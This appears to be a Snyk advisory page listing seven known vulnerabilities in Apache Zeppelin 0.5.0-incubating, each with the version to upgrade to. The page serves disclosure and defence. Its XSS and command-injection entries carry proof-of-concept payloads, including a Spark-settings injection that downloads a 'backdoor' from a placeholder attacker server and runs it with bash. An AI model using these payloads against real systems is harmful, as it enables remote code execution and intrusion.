org.apache.zeppelin:zeppelin 0.5.0-incubating vulnerabilities

Direct Vulnerabilities

Known vulnerabilities in the org.apache.zeppelin:zeppelin package. This does not include vulnerabilities belonging to this package’s dependencies.

How to fix?

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.

Fix for free

Vulnerability	Vulnerable Version
M Improper Input Validation org.apache.zeppelin:zeppelin is a web-based notebook that enables interactive data analytics. Affected versions of this package are vulnerable to Improper Input Validation in `Move folder to Trash` feature allowing an attacker to delete arbitrary files. How to fix Improper Input Validation? Upgrade `org.apache.zeppelin:zeppelin` to version 0.10.0 or higher.	[,0.10.0)
M Cross-site Scripting (XSS) org.apache.zeppelin:zeppelin is a web-based notebook that enables interactive data analytics. Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via the markdown interpreter of Apache Zeppelin, which allows an attacker to inject malicious scripts. PoC `%md foo <script>alert(String.fromCharCode(88,83,83))</script> bar <bold onclick='alert("a");'>qqq</bold>` How to fix Cross-site Scripting (XSS)? Upgrade `org.apache.zeppelin:zeppelin` to version 0.10.0 or higher.	[,0.10.0)
M Command Injection org.apache.zeppelin:zeppelin is a web-based notebook that enables interactive data analytics. Affected versions of this package are vulnerable to Command Injection. Bash command injection vulnerability in Apache Zeppelin allows an attacker to inject system commands into Spark interpreter settings. PoC # Insert into Spark interpreter settings # This example will also crash Spark jobs because command line is truncated spark.executor.memory=16g;touch${IFS%?}/tmp/test # Or another example, in this case Spark jobs will be executed normally without interruption spark.driver.cores=2`{wget,-O,/tmp/x,http://attacker_server:443/backdoor};{chmod,0755,/tmp/x};{bash,-c,/tmp/x}` How to fix Command Injection? Upgrade `org.apache.zeppelin:zeppelin` to version 0.10.0 or higher.	[,0.10.0)
M Access Restriction Bypass org.apache.zeppelin:zeppelin is a web-based notebook that enables interactive data analytics. Affected versions of this package are vulnerable to Access Restriction Bypass. An Authentication bypass vulnerability in Apache Zeppelin allows an attacker to bypass Zeppelin authentication mechanism to act as another user. How to fix Access Restriction Bypass? Upgrade `org.apache.zeppelin:zeppelin` to version 0.10.0 or higher.	[,0.10.0)
M Session Fixation org.apache.zeppelin:zeppelin is a web-based notebook that enables interactive data analytics. Affected versions of this package are vulnerable to Session Fixation. This could allow an attacker to hijack a valid user session by sending a crafted URL with a predetermined session token to a victim which will then be accepted by the application during the victim's authentication. How to fix Session Fixation? Upgrade `org.apache.zeppelin:zeppelin` to version 0.7.3 or higher.	[,0.7.3)
M Cross-site Scripting (XSS) org.apache.zeppelin:zeppelin is a web-based notebook that enables interactive data analytics. Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via Note permissions. How to fix Cross-site Scripting (XSS)? Upgrade `org.apache.zeppelin:zeppelin` to version 0.8.0 or higher.	[,0.8.0)
M Access Control Bypass org.apache.zeppelin:zeppelin is a web-based notebook that enables interactive data analytics. Affected versions of this package are vulnerable to Access Control Bypass. The cron scheduler enabled by default could allow users to run paragraphs as other users without authentication. How to fix Access Control Bypass? Upgrade `org.apache.zeppelin:zeppelin` to version 0.8.0 or higher.	[,0.8.0)

Vulnerability

Vulnerable Version

Improper Input Validation

org.apache.zeppelin:zeppelin is a web-based notebook that enables interactive data analytics.

Affected versions of this package are vulnerable to Improper Input Validation in Move folder to Trash feature allowing an attacker to delete arbitrary files.

How to fix Improper Input Validation?

Upgrade org.apache.zeppelin:zeppelin to version 0.10.0 or higher.

[,0.10.0)

Cross-site Scripting (XSS)

org.apache.zeppelin:zeppelin is a web-based notebook that enables interactive data analytics.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via the markdown interpreter of Apache Zeppelin, which allows an attacker to inject malicious scripts.

PoC

%md
foo
<script>alert(String.fromCharCode(88,83,83))</script>
bar
<bold onclick='alert("a");'>qqq</bold>

How to fix Cross-site Scripting (XSS)?

Upgrade org.apache.zeppelin:zeppelin to version 0.10.0 or higher.

[,0.10.0)

Command Injection

org.apache.zeppelin:zeppelin is a web-based notebook that enables interactive data analytics.

Affected versions of this package are vulnerable to Command Injection. Bash command injection vulnerability in Apache Zeppelin allows an attacker to inject system commands into Spark interpreter settings.

PoC

# Insert into Spark interpreter settings
# This example will also crash Spark jobs because command line is truncated
spark.executor.memory=16g;touch${IFS%?}/tmp/test

# Or another example, in this case Spark jobs will be executed normally without interruption 
spark.driver.cores=2`{wget,-O,/tmp/x,http://attacker_server:443/backdoor};{chmod,0755,/tmp/x};{bash,-c,/tmp/x}`

How to fix Command Injection?

Upgrade org.apache.zeppelin:zeppelin to version 0.10.0 or higher.

[,0.10.0)

Access Restriction Bypass

org.apache.zeppelin:zeppelin is a web-based notebook that enables interactive data analytics.

Affected versions of this package are vulnerable to Access Restriction Bypass. An Authentication bypass vulnerability in Apache Zeppelin allows an attacker to bypass Zeppelin authentication mechanism to act as another user.

How to fix Access Restriction Bypass?

Upgrade org.apache.zeppelin:zeppelin to version 0.10.0 or higher.

[,0.10.0)

Session Fixation

org.apache.zeppelin:zeppelin is a web-based notebook that enables interactive data analytics.

Affected versions of this package are vulnerable to Session Fixation. This could allow an attacker to hijack a valid user session by sending a crafted URL with a predetermined session token to a victim which will then be accepted by the application during the victim's authentication.

How to fix Session Fixation?

Upgrade org.apache.zeppelin:zeppelin to version 0.7.3 or higher.

[,0.7.3)

Cross-site Scripting (XSS)

org.apache.zeppelin:zeppelin is a web-based notebook that enables interactive data analytics.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via Note permissions.

How to fix Cross-site Scripting (XSS)?

Upgrade org.apache.zeppelin:zeppelin to version 0.8.0 or higher.

[,0.8.0)

Access Control Bypass

org.apache.zeppelin:zeppelin is a web-based notebook that enables interactive data analytics.

Affected versions of this package are vulnerable to Access Control Bypass. The cron scheduler enabled by default could allow users to run paragraphs as other users without authentication.

How to fix Access Control Bypass?

Upgrade org.apache.zeppelin:zeppelin to version 0.8.0 or higher.

[,0.8.0)

org.apache.zeppelin:zeppelin@0.5.0-incubating vulnerabilities

latest version

latest non vulnerable version

first published

latest version published

licenses detected

package manager

Direct Vulnerabilities

How to fix?

PoC

PoC